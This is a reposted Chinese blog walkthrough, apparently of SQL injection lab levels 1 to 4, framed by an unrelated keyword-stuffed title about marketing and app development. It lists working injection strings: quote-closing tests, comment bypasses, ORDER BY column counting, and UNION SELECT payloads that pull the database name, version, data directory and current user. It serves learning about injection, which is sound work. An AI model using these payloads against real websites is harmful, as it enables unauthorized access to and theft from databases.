您的位置:首页 > 房产 > 建筑 > 鸿星尔克的网络营销策略_好看的图案设计_app开发用什么软件_百度权重高的网站有哪些

鸿星尔克的网络营销策略_好看的图案设计_app开发用什么软件_百度权重高的网站有哪些

2024/12/26 9:29:58 来源:https://blog.csdn.net/Valder__/article/details/143219551  浏览:    关键词:鸿星尔克的网络营销策略_好看的图案设计_app开发用什么软件_百度权重高的网站有哪些
鸿星尔克的网络营销策略_好看的图案设计_app开发用什么软件_百度权重高的网站有哪些

可以看到输入?id=1' 后页面出现报错信息,看到引号没有正确闭合,我们可以在输入的信息后面再加1'个注释,注释掉后面单引号,就可以正确闭合

出现报错基本就是有漏洞

注释,由于url特殊符号会被过滤,所以常用

%23(#)
--+
--%20(-- )

就可以正常输出

1

检查字段
1,2,3,4...一次尝试
?id=1' order by 4 --+

到4看到页面报错,说明字段为3

联合查询

前面的条件为假,后面的语句就可以执行

?id=1' and 1=2 union select 1,2,3 --+

页面输出了2,3的信息

接下来就可以插入恶意语句

database()  返回数据库名
version()   返回版本
@@datadir   MYSQL服务器的数据目录路径
current_user()  当前用户的用户名和主机名

2

输出的报错信息
' LIMIT 0,1
把引号闭合
去掉1后面的'

可以注入了

?id=1 and 1=2 union select 1,database(),version() --+

3

输出的报错信息
'1'') LIMIT 0,1将)提前闭合
?id=1') --+

4

"1"") LIMIT 0,1和3一样,变成了双引号
?id=1") --+

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com